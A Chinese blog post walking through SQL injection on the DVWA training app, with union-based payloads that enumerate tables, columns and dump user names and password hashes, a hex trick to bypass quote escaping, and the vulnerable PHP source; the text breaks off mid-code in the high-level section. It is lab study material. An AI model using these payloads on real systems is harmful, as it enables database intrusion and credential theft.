<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/180x180a.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/32x32a.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/32x32a.png?v=5.1.4">


  <link rel="mask-icon" href="/images/180x180.svg?v=5.1.4" color="#222">


  <link rel="manifest" href="/images/manifest.json">




  <meta name="keywords" content="SQL注入,">





  <link rel="alternate" href="/atom.xml" title="AbelChe's Blog" type="application/atom+xml">






<meta name="description" content="SQL InjectionLow Level判断注入类型在输入框中输入1，然后提交得到如下内容输入1’，提交得到You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &amp;#39;&amp;#39;">
<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="利用DVWA进行简单的漏洞学习">
<meta property="og:url" content="http://AbelChe.com/2019/04/25/利用DVWA进行简单的漏洞学习/index.html">
<meta property="og:site_name" content="AbelChe&#39;s Blog">
<meta property="og:description" content="SQL InjectionLow Level判断注入类型在输入框中输入1，然后提交得到如下内容输入1’，提交得到You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &amp;#39;&amp;#39;">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://sawvsg.bn.files.1drv.com/y4mPaxBNf7c6hbB6aYNDT1sJHWgI_xKoHA5blVRONulxCxy0OVOFZiewYCc8ug86Y9xGe4MMLwJ5Xh39ioUkevQ-UwfX6O3Ss0DulnJCKpQ6x8eDihDFAaj-hrVJ9lvQqVPrDfO0DTdSxjFKgtk1ca-Km-PgA0NU8Xl3vaj491Lt98zN284L-EoiUTtIXDXDPxEG4a5idDqhv-zv3xpUHZFgA?width=281&height=95&cropmode=none">
<meta property="og:image" content="https://sawtsg.bn.files.1drv.com/y4mYZKTtiGH602vL3dUx6Wefx1Frvo3AjwFW3qoOWTaNH6iclFgqni4PrHcBIHyt2owWmSNv77nHS5KPPBTsAo9lLDmAzCGbekWRHW3DVAQCxN9fdJ8rnJCC4189jol_LxN5Ig55fJsvOfHuWUSGuf4rxaj7xNHtHWx60O9FzKJSZZTsP7eqCLuJAgz0gRwAC7v23Fw96pa9gMswqQp4BWIHQ?width=284&height=327&cropmode=none">
<meta property="og:image" content="https://sawwsg.dm.files.1drv.com/y4mLzUEkcM3F3ydTzBNwS5hch-OJZ2GS11vrq3meDkq2z80U4f8Lv1lU6gnYEkInUXiVSx0PhiuQ0uVzx3Tp_IFzNAvHdRFWWf8YK0o2ov588sjBnqCO-nreiM6-4kipDzVsN7vqLAQ6dGxKlRWZ36QOhFDgxwf6ehfm7WKUqP-YNWA6y-h4kCWzEf_WZ-xNx2kYPXaee44m-Fa_BAg_uWdQw?width=285&height=149&cropmode=none">
<meta property="og:image" content="https://sqwnsg.by.files.1drv.com/y4mSW--M2dh7VCFFAS4jsUGgGEjKLGm105uI78kieOyS15UB_gT7lpuI93eFE7rZSv35tBOeWWsIIVsd1H8tEkrH-oKVQn8apNPdGzNTS-LIKcQ4915UaoTd9iGyAiJoJblJU2yxlb9vGpp0kIVA9z1QSXFbmVbK6koHISQg7Lm-91LLwWIMmFPhMThWuc5Q2rnovRp6fweZDNpNS2ZzBUAMA?width=610&height=209&cropmode=none">
<meta property="og:image" content="https://sqwosg.bn.files.1drv.com/y4mmkEAtD0FfoKaTcBldPkG19MwAhILObO7FAemlmHAf4JhRAlarTEd8h6DaL7ftwwnB6tOjpdB7su6-SAUZiXlZqbAoq1RcjydrHbmMlX9INiuuco1vhg33KXyEHXNFa-8WJoBFqZLqSC_ndYnx5pye0SLgyXCSdOdrMAPP-WNds4h7pxtFC2y8k7t-EpgHcukRpNKRnIp4ms3aiXUJkrnag?width=621&height=554&cropmode=none">
<meta property="og:image" content="https://sawusg.dm.files.1drv.com/y4mVcVCtinKTUMlh3Eoy9Jf0SfmEtW9GdMUMzb3ZTPx64uzVOjGyyrVDlFMar1UcWf2MzSFSJ0HBzEDCtM1ra9xUfAMZt3FG-bOhOTXbE_WWpTZyY0n0gZr-V7_vfBna3qBGac7QVO2lo5XaA_Vo7awnfb42_o-D2cwFdUsFIkZw0gHDT664i2zGgeptuNi4a8kkIRloRj80-Eh9sYpK0z4Ig?width=380&height=382&cropmode=none">
<meta property="og:image" content="https://sawrsg.bn.files.1drv.com/y4mykvYcaeaOz4H0GYQBi_mJAgeW4GGa5HcCOBe3WR_SXJf7kvwOpCYsuXZx-XXW8Y43aJr9ftJoLec_HFqrfFY5PSCeeG12YzU_tGvYwa0irJfmK9v7PMTHR5QUDLUJf7EoAtmC-Feg_vtAFLj7jpb3bfgttNfRoR8SOp7S3xcegNdGJCotChTcdrL2JiV-l8r9GzysOw7ZROlSiyxVGYsTg?width=1881&height=495&cropmode=none">
<meta property="og:image" content="https://sawssg.by.files.1drv.com/y4m3DOyCV0C8ZhP6oCVztMEi9eSyENRi3iQbV_IJEGPOnQOvCrxgf9LVI_WHOUbqnbFeEjtCDqPl5eD7bRtHOyxk8sWBNJAS0AiZQusQmrs-G2TPfXXaB3PTeowLOMCM1-XyASAw9VS8VQhjZYIIBcVr6D6M7t4gnZJd5vabA2bpljjabFCnWfx3ikVDmvS3KaTDprf7NNCZg0sCeX5AFTBAA?width=1840&height=362&cropmode=none">
<meta property="og:image" content="https://sawpsg.dm.files.1drv.com/y4mr8gy0yq15wG5MExK6ENulC387ulNcSdip3gSONsEDlRjXVfqn37IAQSNYQNPnoeed9a1kBWIvzLWxc-vSfF_bDPRXbXFbxv8PKDUKq67EsdzSolb9oZtiSNprKQkgbFrg6KZ43QQ-Szi5NZ6d10QEhX0Ngxi_8eG5DOHZ78lgk0GxkGXFWE6C4JQg9DegtN3xdHA_E3kv9Id-woyjqajwQ?width=1877&height=395&cropmode=none">
<meta property="og:image" content="https://sawqsg.dm.files.1drv.com/y4mLBu0viVRqa0Aum6vc5gV_-mIpuqFetYkSTvf4T-mgDs4PPFLaGa-WY7UT60dZAkEYGDVMPrOuxrFd6oMt3upu1LFhRWgApF5rrJWqaTHTplG67nVum-XSmveLAn8tmmyZtCqwUQ14Mm5SQOzUz3DT6TMzu8SpMilOlwlzmKgzX0i1vCfOYETuFMb3-4Evo5FXwTY5hKpw29kMQnyxSaXLw?width=1896&height=348&cropmode=none">
<meta property="og:image" content="https://sawnsg.bn.files.1drv.com/y4mlRwgdtfBgh36KjGfIPP734mlOLSWIZpQjWN8ezwEJtpgd3SOAJP7E5x9khXLo1Hce2BHXI5_69Pfd5Mz46aXb2aR1JX3L6H6bmE7sEeYHTRoAsjuriMvTG3qAPZiQjgz-kzmiJpXlLN1zaxYnt7FPqrtjgJfRYzAwavrq3VqE0tQWi762sh4w1HYBc1pwomYAEDdcKx8UIYvmV8d_ePgJA?width=1884&height=303&cropmode=none">
<meta property="og:updated_time" content="2019-08-15T11:02:50.013Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="利用DVWA进行简单的漏洞学习">
<meta name="twitter:description" content="SQL InjectionLow Level判断注入类型在输入框中输入1，然后提交得到如下内容输入1’，提交得到You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &amp;#39;&amp;#39;">
<meta name="twitter:image" content="https://sawvsg.bn.files.1drv.com/y4mPaxBNf7c6hbB6aYNDT1sJHWgI_xKoHA5blVRONulxCxy0OVOFZiewYCc8ug86Y9xGe4MMLwJ5Xh39ioUkevQ-UwfX6O3Ss0DulnJCKpQ6x8eDihDFAaj-hrVJ9lvQqVPrDfO0DTdSxjFKgtk1ca-Km-PgA0NU8Xl3vaj491Lt98zN284L-EoiUTtIXDXDPxEG4a5idDqhv-zv3xpUHZFgA?width=281&height=95&cropmode=none">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"slideLeftIn","post_header":"fadeIn","post_body":"fadeIn","coll_header":"fadeIn","sidebar":"slideDownIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://AbelChe.com/2019/04/25/利用DVWA进行简单的漏洞学习/">





  <title>利用DVWA进行简单的漏洞学习 | AbelChe's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta custom-logo">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">AbelChe's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">Youth means limitless possibilities.</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-在线运行">
          <a href="/runcode/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-code"></i> <br>
            
            在线运行
          </a>
        </li>
      
        
        <li class="menu-item menu-item-友链">
          <a href="/friends/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-at"></i> <br>
            
            友链
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            站点地图
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>

<link rel="manifest" href="/manifest.json">

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://AbelChe.com/2019/04/25/利用DVWA进行简单的漏洞学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="AbelChe">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/uploads/images/head.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="AbelChe's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">利用DVWA进行简单的漏洞学习</h2>
        

        <div class="post-meta">
          
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-25T22:05:56+08:00">
                2019-04-25
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2019-08-15T19:02:50+08:00">
                2019-08-15
              </time>
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Learning/" itemprop="url" rel="index">
                    <span itemprop="name">Learning</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/04/25/利用DVWA进行简单的漏洞学习/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2019/04/25/利用DVWA进行简单的漏洞学习/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读数
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2,154 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  10 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h1><h2 id="Low-Level"><a href="#Low-Level" class="headerlink" title="Low Level"></a>Low Level</h2><h3 id="判断注入类型"><a href="#判断注入类型" class="headerlink" title="判断注入类型"></a>判断注入类型</h3><p>在输入框中输入1，然后提交<br>得到如下内容<br><img src="https://sawvsg.bn.files.1drv.com/y4mPaxBNf7c6hbB6aYNDT1sJHWgI_xKoHA5blVRONulxCxy0OVOFZiewYCc8ug86Y9xGe4MMLwJ5Xh39ioUkevQ-UwfX6O3Ss0DulnJCKpQ6x8eDihDFAaj-hrVJ9lvQqVPrDfO0DTdSxjFKgtk1ca-Km-PgA0NU8Xl3vaj491Lt98zN284L-EoiUTtIXDXDPxEG4a5idDqhv-zv3xpUHZFgA?width=281&height=95&cropmode=none" width="281" height="95"><br>输入1’，提交得到<code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;&#39;1&#39;&#39;&#39; at line 1</code><br>说明存在字符型的SQL注入。</p>
<h3 id="猜解字段数"><a href="#猜解字段数" class="headerlink" title="猜解字段数"></a>猜解字段数</h3><p>通过<code>order by</code>进行猜解字段数<br><code>1&#39; order by 1#</code>正常<br><code>1&#39; order by 2#</code>正常<br><code>1&#39; order by 3#</code>返回错误<br>说明查询的字段数是两个<br>那么查询语句的结构差不多就是<code>select &lt;name1&gt;,&lt;name2&gt; from &lt;table&gt; where &lt;id&gt;=&lt;value&gt;;</code></p>
<h3 id="尝试爆出所有字段"><a href="#尝试爆出所有字段" class="headerlink" title="尝试爆出所有字段"></a>尝试爆出所有字段</h3><p>那么我们可以尝试构造<code>1&#39; or &#39;1&#39;=&#39;1</code>来爆出所查询的表里的所有字段(因为是字符型注入，所以要考虑引号的闭合)<br><img src="https://sawtsg.bn.files.1drv.com/y4mYZKTtiGH602vL3dUx6Wefx1Frvo3AjwFW3qoOWTaNH6iclFgqni4PrHcBIHyt2owWmSNv77nHS5KPPBTsAo9lLDmAzCGbekWRHW3DVAQCxN9fdJ8rnJCC4189jol_LxN5Ig55fJsvOfHuWUSGuf4rxaj7xNHtHWx60O9FzKJSZZTsP7eqCLuJAgz0gRwAC7v23Fw96pa9gMswqQp4BWIHQ?width=284&height=327&cropmode=none" width="284" height="327"><br>还原成SQL语句即为<code>select &lt;name1&gt;,&lt;name2&gt; from &lt;table&gt; where &lt;id&gt;=1 or 1=1;</code></p>
<h3 id="union拼接查询敏感信息"><a href="#union拼接查询敏感信息" class="headerlink" title="union拼接查询敏感信息"></a>union拼接查询敏感信息</h3><p>使用联合查询 union 可以爆出我们想知道的一些数据库敏感信息<br><a href="https://www.jianshu.com/p/ea15158f39f7" target="_blank" rel="noopener">关于MySQL的information_schema库</a><br>爆出数据库名</p>
<p><code>1&#39; union select database(),2;#</code><br><img src="https://sawwsg.dm.files.1drv.com/y4mLzUEkcM3F3ydTzBNwS5hch-OJZ2GS11vrq3meDkq2z80U4f8Lv1lU6gnYEkInUXiVSx0PhiuQ0uVzx3Tp_IFzNAvHdRFWWf8YK0o2ov588sjBnqCO-nreiM6-4kipDzVsN7vqLAQ6dGxKlRWZ36QOhFDgxwf6ehfm7WKUqP-YNWA6y-h4kCWzEf_WZ-xNx2kYPXaee44m-Fa_BAg_uWdQw?width=285&height=149&cropmode=none" width="285" height="149"><br>爆出数据库表<br><code>1&#39; union select 1,table_name from information_schema.tables where table_schema=&#39;dvwa&#39;#</code><br><img src="https://sqwnsg.by.files.1drv.com/y4mSW--M2dh7VCFFAS4jsUGgGEjKLGm105uI78kieOyS15UB_gT7lpuI93eFE7rZSv35tBOeWWsIIVsd1H8tEkrH-oKVQn8apNPdGzNTS-LIKcQ4915UaoTd9iGyAiJoJblJU2yxlb9vGpp0kIVA9z1QSXFbmVbK6koHISQg7Lm-91LLwWIMmFPhMThWuc5Q2rnovRp6fweZDNpNS2ZzBUAMA?width=610&height=209&cropmode=none" width="610" height="209"><br>爆出表中的所有列<br><code>1&#39; union select 1,column_name from information_schema.columns where table_name=&#39;users&#39;#</code><br><img src="https://sqwosg.bn.files.1drv.com/y4mmkEAtD0FfoKaTcBldPkG19MwAhILObO7FAemlmHAf4JhRAlarTEd8h6DaL7ftwwnB6tOjpdB7su6-SAUZiXlZqbAoq1RcjydrHbmMlX9INiuuco1vhg33KXyEHXNFa-8WJoBFqZLqSC_ndYnx5pye0SLgyXCSdOdrMAPP-WNds4h7pxtFC2y8k7t-EpgHcukRpNKRnIp4ms3aiXUJkrnag?width=621&height=554&cropmode=none" width="621" height="554"><br>查出用户名和密码<br><code>1&#39; union select user,password from users#</code><br><img src="https://sawusg.dm.files.1drv.com/y4mVcVCtinKTUMlh3Eoy9Jf0SfmEtW9GdMUMzb3ZTPx64uzVOjGyyrVDlFMar1UcWf2MzSFSJ0HBzEDCtM1ra9xUfAMZt3FG-bOhOTXbE_WWpTZyY0n0gZr-V7_vfBna3qBGac7QVO2lo5XaA_Vo7awnfb42_o-D2cwFdUsFIkZw0gHDT664i2zGgeptuNi4a8kkIRloRj80-Eh9sYpK0z4Ig?width=380&height=382&cropmode=none" width="380" height="382"></p>
<h3 id="审计源码和总结"><a href="#审计源码和总结" class="headerlink" title="审计源码和总结"></a>审计源码和总结</h3><p>源码如下</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="keyword">if</span>( <span class="keyword">isset</span>( $_REQUEST[ <span class="string">'Submit'</span> ] ) ) &#123;</span></span><br><span class="line"><span class="php">    <span class="comment">// Get input</span></span></span><br><span class="line"><span class="php">    $id = $_REQUEST[ <span class="string">'id'</span> ];</span></span><br><span class="line"></span><br><span class="line"><span class="php">    <span class="comment">// Check database</span></span></span><br><span class="line"><span class="php">    $query  = <span class="string">"SELECT first_name, last_name FROM users WHERE user_id = '$id';"</span>;</span></span><br><span class="line"><span class="php">    $result = mysqli_query($GLOBALS[<span class="string">"___mysqli_ston"</span>],  $query ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'&lt;pre&gt;'</span> . ((is_object($GLOBALS[<span class="string">"___mysqli_ston"</span>])) ? mysqli_error($GLOBALS[<span class="string">"___mysqli_ston"</span>]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : <span class="keyword">false</span>)) . <span class="string">'&lt;/pre&gt;'</span> );</span></span><br><span class="line"></span><br><span class="line"><span class="php">    <span class="comment">// Get results</span></span></span><br><span class="line"><span class="php">    <span class="keyword">while</span>( $row = mysqli_fetch_assoc( $result ) ) &#123;</span></span><br><span class="line"><span class="php">        <span class="comment">// Get values</span></span></span><br><span class="line"><span class="php">        $first = $row[<span class="string">"first_name"</span>];</span></span><br><span class="line"><span class="php">        $last  = $row[<span class="string">"last_name"</span>];</span></span><br><span class="line"></span><br><span class="line"><span class="php">        <span class="comment">// Feedback for end user</span></span></span><br><span class="line"><span class="php">        <span class="keyword">echo</span> <span class="string">"&lt;pre&gt;ID: &#123;$id&#125;&lt;br /&gt;First name: &#123;$first&#125;&lt;br /&gt;Surname: &#123;$last&#125;&lt;/pre&gt;"</span>;</span></span><br><span class="line"><span class="php">    &#125;</span></span><br><span class="line"></span><br><span class="line"><span class="php">    mysqli_close($GLOBALS[<span class="string">"___mysqli_ston"</span>]);</span></span><br><span class="line"><span class="php">&#125;</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<p>可以看到程序没有对输入的变量<code>$id</code>做任何安全处理，这也直接导致了sql注入的产生</p>
<h2 id="Medium-Level"><a href="#Medium-Level" class="headerlink" title="Medium Level"></a>Medium Level</h2><p>选择Medium等级，发现对输入做了明显的输入限制，从自由输入变为选择id<br>虽然我们在页面上无法进行输入，但是我们可以通过抓包更改数据的方式进行SQL注入</p>
<blockquote>
<p>配好代理，打开bp开始抓包，抓到数据包发现是数字型注入，方式和low等级方式基本相同<br>要注意的是转义了’等符号，在提交时会将’，”等符号转义为&#39;，&quot;<br>所以在payload中不要出现引号</p>
</blockquote>
<p>先order by查字段数</p>
<p><code>id=1 or 1=1</code><br><img src="https://sawrsg.bn.files.1drv.com/y4mykvYcaeaOz4H0GYQBi_mJAgeW4GGa5HcCOBe3WR_SXJf7kvwOpCYsuXZx-XXW8Y43aJr9ftJoLec_HFqrfFY5PSCeeG12YzU_tGvYwa0irJfmK9v7PMTHR5QUDLUJf7EoAtmC-Feg_vtAFLj7jpb3bfgttNfRoR8SOp7S3xcegNdGJCotChTcdrL2JiV-l8r9GzysOw7ZROlSiyxVGYsTg?width=1881&height=495&cropmode=none" alt><br><code>id=1 union select database(),2</code><br><img src="https://sawssg.by.files.1drv.com/y4m3DOyCV0C8ZhP6oCVztMEi9eSyENRi3iQbV_IJEGPOnQOvCrxgf9LVI_WHOUbqnbFeEjtCDqPl5eD7bRtHOyxk8sWBNJAS0AiZQusQmrs-G2TPfXXaB3PTeowLOMCM1-XyASAw9VS8VQhjZYIIBcVr6D6M7t4gnZJd5vabA2bpljjabFCnWfx3ikVDmvS3KaTDprf7NNCZg0sCeX5AFTBAA?width=1840&height=362&cropmode=none" alt><br><code>id=1 union select table_name,2 from information_schema.tables where table_schema=database()</code><br><img src="https://sawpsg.dm.files.1drv.com/y4mr8gy0yq15wG5MExK6ENulC387ulNcSdip3gSONsEDlRjXVfqn37IAQSNYQNPnoeed9a1kBWIvzLWxc-vSfF_bDPRXbXFbxv8PKDUKq67EsdzSolb9oZtiSNprKQkgbFrg6KZ43QQ-Szi5NZ6d10QEhX0Ngxi_8eG5DOHZ78lgk0GxkGXFWE6C4JQg9DegtN3xdHA_E3kv9Id-woyjqajwQ?width=1877&height=395&cropmode=none" alt><br>因为转移了引号，所以这里的表名用16进制进行绕过引号<code>id=1 union select 1,group_concat(column_name) from information_schema.columns where  table_name=0x75736572</code><br><img src="https://sawqsg.dm.files.1drv.com/y4mLBu0viVRqa0Aum6vc5gV_-mIpuqFetYkSTvf4T-mgDs4PPFLaGa-WY7UT60dZAkEYGDVMPrOuxrFd6oMt3upu1LFhRWgApF5rrJWqaTHTplG67nVum-XSmveLAn8tmmyZtCqwUQ14Mm5SQOzUz3DT6TMzu8SpMilOlwlzmKgzX0i1vCfOYETuFMb3-4Evo5FXwTY5hKpw29kMQnyxSaXLw?width=1896&height=348&cropmode=none" alt><br><code>id=1 union select user,password from users</code><br><img src="https://sawnsg.bn.files.1drv.com/y4mlRwgdtfBgh36KjGfIPP734mlOLSWIZpQjWN8ezwEJtpgd3SOAJP7E5x9khXLo1Hce2BHXI5_69Pfd5Mz46aXb2aR1JX3L6H6bmE7sEeYHTRoAsjuriMvTG3qAPZiQjgz-kzmiJpXlLN1zaxYnt7FPqrtjgJfRYzAwavrq3VqE0tQWi762sh4w1HYBc1pwomYAEDdcKx8UIYvmV8d_ePgJA?width=1884&height=303&cropmode=none" alt></p>
<h2 id="High-Leavel"><a href="#High-Leavel" class="headerlink" title="High Leavel"></a>High Leavel</h2><p>分析 high 等级的源码</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="keyword">if</span>( <span class="keyword">isset</span>( $_SESSION [ <span class="string">'id'</span> ] ) ) &#123;</span></span><br><span class="line"><span class="php">    <span class="comment">// Get input</span></span></span><br><span class="line"><span class="php">    $id = $_SESSION[ <span class="string">'id'</span> ];</span></span><br><span class="line"></span><br><span class="line"><span class="php">    <span class="comment">// Check database</span></span></span><br><span class="line"><span class="php">    $query  = <span class="string">"SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"</span>;</span></span><br><span class="line"><span class="php">    $result = mysqli_query($GLOBALS[<span class="string">"___mysqli_ston"</span>], $query ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'&lt;pre&gt;Something went wrong.&lt;/pre&gt;'</span> );</span></span><br><span class="line"></span><br><span class="line"><span class="php">    <span class="comment">// Get results</span></span></span><br><span class="line"><span class="php">    <span class="keyword">while</span>( $row = mysqli_fetch_assoc( $result ) ) &#123;</span></span><br><span class="line"><span class="php">        <span class="comment">// Get values</span></span></span><br><span class="line"><span class="php">        $first = $row[<span class="string">"first_name"</span>];</span></span><br><span class="line"><span class="php">        $last  = $row[<span class="string">"last_name"</span>];</span></span><br><span class="line"></span><br><span class="line"><span class="php">        <span class="comment">// Feedback for end user</span></span></span><br><span class="line"><span class="php">        <span class="keyword">echo</span> <span class="string">"&lt;pre&gt;ID: &#123;$id&#125;&lt;br /&gt;First name: &#123;$first&#125;&lt;br /&gt;Surname: &#123;$last&#125;&lt;/pre&gt;"</span>;</span></span><br><span class="line"><span class="php">    &#125;</span></span><br><span class="line"></span><br><span class="line"><span class="php">    ((is_null($___mysqli_res = mysqli_close($GLOBALS[<span class="string">"___mysqli_ston"</span>]))) ? <span 